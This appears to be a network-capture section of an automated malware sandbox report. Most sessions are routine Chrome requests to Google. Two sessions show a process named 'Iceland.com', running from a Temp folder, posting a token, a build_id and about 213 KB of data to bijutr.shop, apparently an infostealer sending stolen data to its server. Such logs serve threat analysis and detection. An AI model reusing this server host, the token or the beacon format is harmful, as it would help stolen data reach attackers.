2024-12-27 06:10:00 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 06:10:01 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 27 Dec 2024 06:10:01 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-27 06:10:01 UTC	372	IN	Data Raw: 31 37 32 61 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 172a)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-27 06:10:01 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-27 06:10:01 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-27 06:10:01 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-27 06:10:01 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-27 06:10:01 UTC	6	IN	Data Raw: 65 6e 75 2d 0d 0a Data Ascii: enu-
2024-12-27 06:10:01 UTC	258	IN	Data Raw: 66 63 0d 0a 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 Data Ascii: fccontent","metadata":{"bar_height":60,"experiment_id":[3700333,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){va
2024-12-27 06:10:01 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 Data Ascii: 8000 window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener
2024-12-27 06:10:01 UTC	1390	IN	Data Raw: 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 46 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b Data Ascii: uctor(a){this.i\u003da}toString(){return this.i}};_.Jd\u003dnew _.Id(\"about:invalid#zClosurez\");_.Fd\u003dclass{constructor(a){this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([
2024-12-27 06:10:01 UTC	1390	IN	Data Raw: 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 Data Ascii: \u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce\|\|b.getAttribute(\"nonce\")\|\|\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"arr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49807	172.217.21.36	443	3732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:00 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 06:10:01 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 27 Dec 2024 06:10:01 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-27 06:10:01 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-27 06:10:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49830	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:05 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----S0RQI589Z58YU37GVKNO User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:05 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 53 30 52 51 49 35 38 39 5a 35 38 59 55 33 37 47 56 4b 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 53 30 52 51 49 35 38 39 5a 35 38 59 55 33 37 47 56 4b 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 53 30 52 51 49 35 38 39 5a 35 38 59 55 33 37 47 56 4b 4e 4f 0d 0a 43 6f 6e 74 Data Ascii: ------S0RQI589Z58YU37GVKNOContent-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------S0RQI589Z58YU37GVKNOContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------S0RQI589Z58YU37GVKNOCont
2024-12-27 06:10:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-27 06:10:06 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49833	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:06 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----S2VA1NO8GLNYMY58GL6F User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:06 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 53 32 56 41 31 4e 4f 38 47 4c 4e 59 4d 59 35 38 47 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 53 32 56 41 31 4e 4f 38 47 4c 4e 59 4d 59 35 38 47 4c 36 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 53 32 56 41 31 4e 4f 38 47 4c 4e 59 4d 59 35 38 47 4c 36 46 0d 0a 43 6f 6e 74 Data Ascii: ------S2VA1NO8GLNYMY58GL6FContent-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------S2VA1NO8GLNYMY58GL6FContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------S2VA1NO8GLNYMY58GL6FCont
2024-12-27 06:10:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:06 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
